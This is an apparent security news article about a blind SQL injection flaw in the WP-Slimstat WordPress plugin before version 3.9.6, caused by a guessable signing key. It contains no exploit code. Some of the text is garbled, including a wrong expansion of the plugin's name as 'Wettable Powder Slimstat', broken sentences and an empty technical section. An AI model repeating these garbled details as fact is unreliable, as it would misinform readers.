Critical WordPress Analytics Plugin Vulnerability Affects 1.3 Million Websites

  •  
  •  
  •  
  •  
  •  
  •  
  •  
  •  

Critical WordPress Analytics Plugin Vulnerability Affects 1.3 Million Websites of being compromised by attackers.

The vulnerability resides within the majority of versions of WordPress plugin called Wettable Powder Slimstat (WP-Slimstat). While there are more than 70 million websites on the Internet that are running WordPress, over 1.3 Million of them are using ‘WP-Slimstat’ ensuring it to be one of the popular plugins using within WordPress.

Versions prior to Slimstat 3.9.6 contain an easily guessable key that’s used to sign data sent between the server and client, based on a blog post published on Tuesday from Web security firm Sucuri. The outcome is a SQL injection vector that can be used to extract highly sensitive data, including encrypted passwords and the encryption keys used to remotely administer websites.

Once the so called ‘secret’ key is broken an attacker can then perform an SQL injection against the target website in order to grab sensitive information from victim’s database, including encrypted passwords.

“If your website uses a vulnerable version of the plugin, you’re at risk,” said Marc-Alexandre Montpas, a senior vulnerability researcher

he went on to say “Successful exploitation of this bug could lead to Blind SQL Injection attacks, which means an attacker could grab sensitive information from your database, including username, (hashed) passwords and, in certain configurations, WordPress Secret Keys (which could result in a total site takeover).”

Technical details

it is possible to guess the secret key sent to and from the client by looking at it’s value:

Critical WordPress Analytics Plugin Vulnerability Affects 1.3 Million Websites
Critical WordPress Analytics Plugin Vulnerability Affects 1.3 Million Websites

 

 

 

 

 

You can find full details of how the on the securi blog here

The following two tabs change content below.

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]

Unallocated Author

Please note that the article you are reading has an unallocated author as the original author is no longer employed at latesthackingnews.com, this has been put in place to adhere with general data protection regulations (GDPR). If you have any further queries, please contact: [email protected]

Leave a Reply